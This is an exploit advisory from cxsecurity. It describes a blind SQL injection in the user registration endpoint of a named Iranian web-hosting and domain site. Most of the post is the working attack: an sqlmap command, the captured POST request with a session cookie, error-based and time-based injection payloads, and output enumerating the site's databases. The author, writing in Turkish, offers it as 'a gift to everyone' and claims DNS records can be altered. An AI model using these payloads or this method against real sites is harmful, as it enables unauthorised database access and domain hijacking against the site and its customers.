Webtala Blind SQL İnjection ( Domain Kayıt )

2020.06.01
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Tested On : Kali Linux # Contact : instagram.com/rootayyildiz/ benden herkeze hediye olsun dns kayıtları değiştirile biliyor cloudflare ile test yaptım sqlmap -r 1.txt --dbs --batch POST /reguser.php HTTP/1.1 Content-Length: 207 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://webtala.ir/ Cookie: PHPSESSID=0m4g0tqfbf3ksi17scbev18d77 Host: webtala.ir Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* aaaa=%d8%ab%d8%a8%d8%aa%20%d9%86%d8%a7%d9%85&capthtc=1&email=-1'%20OR%203*2*1=6%20AND%20000121=000121%20--%20&mob=1&namefull=tftqpqdk&pass1=g00dPa%24%24w0rD&pass2=g00dPa%24%24w0rD&sabtename=ok&user1=tftqpqdk Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: aaaa=%d8%ab%d8%a8%d8%aa %d9%86%d8%a7%d9%85&capthtc=1&email=-1' OR 3 AND (SELECT 6556 FROM(SELECT COUNT(*),CONCAT(0x7176766b71,(SELECT (ELT(6556=6556,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- gzTW21=6 AND 000121=000121 -- &mob=1&namefull=tftqpqdk&pass1=g00dPa$$w0rD&pass2=g00dPa$$w0rD&sabtename=ok&user1=tftqpqdk Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: aaaa=%d8%ab%d8%a8%d8%aa %d9%86%d8%a7%d9%85&capthtc=1&email=-1' OR 3 AND (SELECT 7076 FROM (SELECT(SLEEP(5)))gFjV)-- qFNZ21=6 AND 000121=000121 -- &mob=1&namefull=tftqpqdk&pass1=g00dPa$$w0rD&pass2=g00dPa$$w0rD&sabtename=ok&user1=tftqpqdk --- back-end DBMS: MySQL >= 5.0 (MariaDB fork) available databases [2]: [*] admin_webtala [*] information_schema


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top